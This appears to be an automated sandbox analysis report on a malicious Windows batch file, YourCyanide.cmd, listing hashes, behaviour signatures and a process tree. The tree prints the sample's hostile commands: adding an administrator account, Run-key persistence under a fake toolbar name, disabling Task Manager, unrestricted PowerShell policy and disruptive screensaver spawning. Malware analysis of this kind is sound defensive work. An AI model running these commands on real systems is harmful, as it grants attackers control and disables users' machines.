Resubmissions
15-11-2024 12:51
241115-p3ywnsthmh 918-05-2022 00:35
220518-axmh5abbc9 1018-05-2022 00:32
220518-avncmsbbb7 10Analysis
-
max time kernel
35s -
max time network
101s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-11-2024 12:51
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide.cmd
Resource
win11-20241023-en
Errors
General
-
Target
YourCyanide.cmd
-
Size
90KB
-
MD5
4cb725f17bec289507f9e8249c8ea80e
-
SHA1
a7034e84cb884bf90e61ce3b621424bec57334ae
-
SHA256
1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
-
SHA512
776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
-
SSDEEP
1536:myOIprQ75GiWVIHp/gyaNFCygr8dcW7HO2mVd75lQCgyUqG8cA4eD1yXHn/Wjvur:myOIp1
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 1748 powershell.exe -
pid Process 2476 powershell.exe 3620 powershell.exe 3652 powershell.exe 2000 powershell.exe 4056 powershell.exe 4760 powershell.exe 4336 powershell.exe 1748 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 64 IoCs
pid Process 1640 netsh.exe 1632 netsh.exe 3944 netsh.exe 4988 netsh.exe 1168 netsh.exe 2280 netsh.exe 2956 netsh.exe 1420 netsh.exe 1488 netsh.exe 916 netsh.exe 4196 netsh.exe 3676 netsh.exe 4264 netsh.exe 2796 netsh.exe 4476 netsh.exe 4176 netsh.exe 4200 netsh.exe 2584 netsh.exe 916 netsh.exe 1664 netsh.exe 2844 netsh.exe 1384 netsh.exe 2332 netsh.exe 4348 netsh.exe 4024 netsh.exe 1668 netsh.exe 4404 netsh.exe 1732 netsh.exe 3156 netsh.exe 3788 netsh.exe 1588 netsh.exe 1108 netsh.exe 3588 netsh.exe 3588 netsh.exe 1168 netsh.exe 4156 netsh.exe 3436 netsh.exe 2632 netsh.exe 4024 netsh.exe 2700 netsh.exe 2024 netsh.exe 2188 netsh.exe 3532 netsh.exe 3196 netsh.exe 3640 netsh.exe 4400 netsh.exe 4884 netsh.exe 1732 netsh.exe 3312 netsh.exe 3944 netsh.exe 1876 netsh.exe 2368 netsh.exe 3456 netsh.exe 260 netsh.exe 1068 netsh.exe 3688 netsh.exe 2720 netsh.exe 4756 netsh.exe 260 netsh.exe 4440 netsh.exe 4276 netsh.exe 4848 netsh.exe 2796 netsh.exe 3456 netsh.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_17507_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 2 pastebin.com -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Time Discovery 1 TTPs 6 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 4092 net1.exe 840 net.exe 1488 net1.exe 3116 net.exe 1176 net1.exe 3216 net.exe -
Kills process with taskkill 1 IoCs
pid Process 4848 taskkill.exe -
Modifies registry class 46 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" powershell.exe Key created \Registry\User\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\NotificationData powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 powershell.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24 cmd.exe File opened for modification C:\Users\Admin\%ONRsX:~13 cmd.exe File opened for modification C:\Users\Admin\%onRsx:~13 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 2476 powershell.exe 2476 powershell.exe 2476 powershell.exe 4424 tskill.exe 4424 tskill.exe 3676 tskill.exe 3676 tskill.exe 2156 tskill.exe 2156 tskill.exe 4132 tskill.exe 4132 tskill.exe 2332 tskill.exe 2332 tskill.exe 1932 tskill.exe 1932 tskill.exe 1516 tskill.exe 1516 tskill.exe 1224 tskill.exe 1224 tskill.exe 1160 tskill.exe 1160 tskill.exe 3764 tskill.exe 3764 tskill.exe 1996 tskill.exe 1996 tskill.exe 4936 tskill.exe 4936 tskill.exe 4904 tskill.exe 4904 tskill.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 3620 powershell.exe 3620 powershell.exe 3652 powershell.exe 3652 powershell.exe 2000 powershell.exe 2000 powershell.exe 3620 powershell.exe 4056 powershell.exe 4056 powershell.exe 4056 powershell.exe 2000 powershell.exe 3652 powershell.exe 3620 powershell.exe 4056 powershell.exe 2000 powershell.exe 3652 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 4848 taskkill.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 4336 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4760 powershell.exe 4336 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4896 wrote to memory of 1420 4896 cmd.exe 80 PID 4896 wrote to memory of 1420 4896 cmd.exe 80 PID 4896 wrote to memory of 5088 4896 cmd.exe 81 PID 4896 wrote to memory of 5088 4896 cmd.exe 81 PID 4896 wrote to memory of 2288 4896 cmd.exe 82 PID 4896 wrote to memory of 2288 4896 cmd.exe 82 PID 4896 wrote to memory of 3680 4896 cmd.exe 84 PID 4896 wrote to memory of 3680 4896 cmd.exe 84 PID 4896 wrote to memory of 1644 4896 cmd.exe 86 PID 4896 wrote to memory of 1644 4896 cmd.exe 86 PID 4896 wrote to memory of 2972 4896 cmd.exe 88 PID 4896 wrote to memory of 2972 4896 cmd.exe 88 PID 4896 wrote to memory of 4224 4896 cmd.exe 90 PID 4896 wrote to memory of 4224 4896 cmd.exe 90 PID 4896 wrote to memory of 2476 4896 cmd.exe 92 PID 4896 wrote to memory of 2476 4896 cmd.exe 92 PID 4896 wrote to memory of 4672 4896 cmd.exe 93 PID 4896 wrote to memory of 4672 4896 cmd.exe 93 PID 4672 wrote to memory of 756 4672 net.exe 95 PID 4672 wrote to memory of 756 4672 net.exe 95 PID 4896 wrote to memory of 3852 4896 cmd.exe 96 PID 4896 wrote to memory of 3852 4896 cmd.exe 96 PID 4896 wrote to memory of 4432 4896 cmd.exe 97 PID 4896 wrote to memory of 4432 4896 cmd.exe 97 PID 4896 wrote to memory of 2472 4896 cmd.exe 98 PID 4896 wrote to memory of 2472 4896 cmd.exe 98 PID 4896 wrote to memory of 2124 4896 cmd.exe 99 PID 4896 wrote to memory of 2124 4896 cmd.exe 99 PID 4896 wrote to memory of 3180 4896 cmd.exe 102 PID 4896 wrote to memory of 3180 4896 cmd.exe 102 PID 3180 wrote to memory of 4900 3180 net.exe 103 PID 3180 wrote to memory of 4900 3180 net.exe 103 PID 2472 wrote to memory of 1996 2472 cmd.exe 104 PID 2472 wrote to memory of 1996 2472 cmd.exe 104 PID 4896 wrote to memory of 4848 4896 cmd.exe 105 PID 4896 wrote to memory of 4848 4896 cmd.exe 105 PID 2124 wrote to memory of 2572 2124 cmd.exe 106 PID 2124 wrote to memory of 2572 2124 cmd.exe 106 PID 2472 wrote to memory of 1576 2472 cmd.exe 108 PID 2472 wrote to memory of 1576 2472 cmd.exe 108 PID 2124 wrote to memory of 3980 2124 cmd.exe 109 PID 2124 wrote to memory of 3980 2124 cmd.exe 109 PID 4896 wrote to memory of 1816 4896 cmd.exe 110 PID 4896 wrote to memory of 1816 4896 cmd.exe 110 PID 2472 wrote to memory of 1072 2472 cmd.exe 111 PID 2472 wrote to memory of 1072 2472 cmd.exe 111 PID 1816 wrote to memory of 2832 1816 net.exe 184 PID 1816 wrote to memory of 2832 1816 net.exe 184 PID 4896 wrote to memory of 3624 4896 cmd.exe 113 PID 4896 wrote to memory of 3624 4896 cmd.exe 113 PID 2124 wrote to memory of 3996 2124 cmd.exe 114 PID 2124 wrote to memory of 3996 2124 cmd.exe 114 PID 3624 wrote to memory of 4980 3624 net.exe 187 PID 3624 wrote to memory of 4980 3624 net.exe 187 PID 2472 wrote to memory of 2672 2472 cmd.exe 192 PID 2472 wrote to memory of 2672 2472 cmd.exe 192 PID 4896 wrote to memory of 444 4896 cmd.exe 117 PID 4896 wrote to memory of 444 4896 cmd.exe 117 PID 444 wrote to memory of 1868 444 net.exe 190 PID 444 wrote to memory of 1868 444 net.exe 190 PID 2124 wrote to memory of 2828 2124 cmd.exe 193 PID 2124 wrote to memory of 2828 2124 cmd.exe 193 PID 4896 wrote to memory of 4056 4896 cmd.exe 225 PID 4896 wrote to memory of 4056 4896 cmd.exe 225 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1420 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:1420
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:5088
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2288
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3680
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2972
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:756
-
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_17507_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
PID:3852
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:4432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1996
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1072
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2672
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4256
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1920
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3184
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1888
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2256
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4324
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5024
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4476
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:892
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2152
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2844
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4760
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3788
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2540
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2468
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3180
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4464
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2828
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2172
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2368
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1472
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:896
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4652
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4336
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:112
-
-
